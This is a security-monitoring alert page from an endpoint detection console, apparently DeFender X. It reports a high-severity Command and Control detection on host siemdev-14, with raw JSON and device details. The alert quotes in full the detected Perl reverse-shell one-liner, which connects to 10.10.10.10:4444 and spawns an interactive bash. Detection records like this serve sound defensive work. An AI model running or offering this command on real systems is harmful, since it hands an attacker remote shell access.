Alert Details - DeFender X

Alert Information High

Alert ID: ind:021368f9220b45cdb2760a069897c1c8:1766234338780427931-30103-1312016
Composite ID: 84393bf974fd44bda943a25a6a7bc27f:ind:021368f9220b45cdb2760a069897c1c8:1766234338780427931-30103-1312016
설명: Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.
호스트: siemdev-14
상태: new
생성 시간: 2025-12-20 21:40:00
업데이트 시간: 2025-12-20 22:39:00

MITRE ATT&CK

Tactic: Command and Control
Technique: Remote Access Tools

Command Line

bash -c timeout 5 bash -c 'perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:4444");STDIN->fdopen($c,r);exec"/bin/bash -i";''

Raw JSON Data

{"id":"ind:021368f9220b45cdb2760a069897c1c8:1766234338780427931-30103-1312016","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:021368f9220b45cdb2760a069897c1c8:1766234338780427931-30103-1312016","agent_id":"021368f9220b45cdb2760a069897c1c8","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Command and Control","tactic_id":"TA0011","technique":"Remote Access Tools","technique_id":"T1219","cmdline":"bash -c timeout 5 bash -c \u0027perl -MIO -e \u0027$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\u002210.10.10.10:4444\u0022);STDIN-\u003Efdopen($c,r);exec\u0022/bin/bash -i\u0022;\u0027\u0027","filename":"bash","filepath":"/usr/bin/bash","sha256":"a59fc4da19d169c175b247bfaf4a21c2ee7c16c3ed2820daa807ab12affe98fc","status":"new","type":"ldt","created_timestamp":"2025-12-20T12:40:00.833768505Z","updated_timestamp":"2025-12-20T13:39:00.838999458Z","device":{"device_id":"021368f9220b45cdb2760a069897c1c8","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"siemdev-14","local_ip":"172.17.0.1","external_ip":"211.198.135.5","mac_address":"16-bc-32-c0-b2-f4","platform_name":"Linux","os_version":"Rocky Linux 10.1"},"aggregate_id":"aggind:021368f9220b45cdb2760a069897c1c8:25803890233","CreatedAt":"2025-12-20T21:40:00.8337685+09:00","UpdatedAt":"2025-12-20T22:39:00.8389995+09:00"}

Quick Info

Severity High
Score 70
Agent ID 021368f9220b45cdb2760a069897c1c8

Actions

Falcon Console에서 보기 목록으로 돌아가기